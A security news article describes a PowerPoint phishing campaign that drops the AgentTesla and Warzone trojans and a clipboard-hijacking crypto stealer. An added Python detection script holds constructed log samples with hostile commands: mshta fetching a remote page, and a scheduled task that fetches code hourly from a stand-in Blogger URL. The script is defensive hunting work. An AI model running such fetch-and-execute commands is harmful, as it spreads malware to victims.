Researchers from Netskope’s Threat Labs have documented a PowerPoint-based information-stealing campaign that has been in the wild since late last year.

The threat actors are dropping AgentTesla and Warzone, two powerful data-stealing RATs. Researchers have also spotted a cryptocurrency stealer alongside them, and they warn people to be vigilant when clicking on and opening suspicious PowerPoint files.

PowerPoint Files Dropping RATs

A publication shared by Netskope’s Threat Labs details a malicious campaign that picked up pace in December 2021. As per their report, spam emails carrying PowerPoint files are being distributed in the wild; the attachments deliver remote access trojans (RATs) and rely on legitimate cloud services.

In the first instance, AgentTesla, a powerful RAT, is distributed through PowerPoint phishing attachments. The file contains an obfuscated macro that uses a combination of PowerShell and MSHTA for execution.

A function to disable Windows Defender also comes along with AgentTesla. Further, a VBS script creates a scheduled task that runs every hour and fetches a cryptocurrency stealer from a Blogger URL.
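As an added example (not from Netskope’s report or the original article), the chain described above, PowerPoint launching a script host and an hourly scheduled task pulling from a Blogger URL, can be hunted for in process-creation logs. The event field names, sample records and rule names below are constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation records (hypothetical field names, not from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/p/1.html"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": 'schtasks /create /sc HOURLY /mo 1 /tn "updater" '
            '/tr "mshta https://constructed-sample.blogspot.com/p/2.html" /F'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmd": r'POWERPNT.EXE "C:\Users\a\deck.pptx"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /sc DAILY /tn "backup" /tr "C:\tools\backup.exe"'},
]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.I)
BLOGGER_HOST = re.compile(r"(^|\.)(blogspot|blogger)\.com$", re.I)

def exe(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def detect(event):
    """Return the names of the rules this event matches."""
    hits = []
    cmd = event["cmd"]
    # Rule 1: PowerPoint should not start a script interpreter.
    if exe(event["parent"]) == "powerpnt.exe" and exe(event["image"]) in SCRIPT_HOSTS:
        hits.append("powerpoint_spawned_script_host")
    # Rule 2: a task created to run hourly whose action contains a URL.
    if exe(event["image"]) == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        hosts = URL_HOST.findall(cmd)
        if re.search(r"/sc\s+hourly\b", cmd, re.I) and hosts:
            hits.append("hourly_task_fetches_url")
            # Rule 3: the URL is on Blogger, as in the campaign described above.
            if any(BLOGGER_HOST.search(h) for h in hosts):
                hits.append("hourly_task_fetches_blogger_url")
    return hits

def scan(events):
    """Return (index, matched rules) for every event that matches a rule."""
    results = [(i, detect(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]
```

Calling `scan(SAMPLE_EVENTS)` flags the first two constructed records and leaves the ordinary PowerPoint launch and the daily backup task alone.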

In the second instance, another RAT named Warzone is delivered. While Netskope hasn’t shared many details about it, they said a dedicated cryptocurrency stealer is also involved in this campaign; it watches the clipboard of the victim’s system and, when it detects a cryptocurrency wallet address, replaces it with one belonging to the attacker.

The supported cryptocurrency wallets are Bitcoin, Ethereum, XMR, DOGE, and more. The researchers at Netskope have shared the complete list of IoCs, along with the wallets used by the actors, on this GitHub page for awareness.

Threat actors are also seen using legitimate cloud services to host and retrieve their malicious payloads. This method is used because it is less likely to be flagged by security systems.

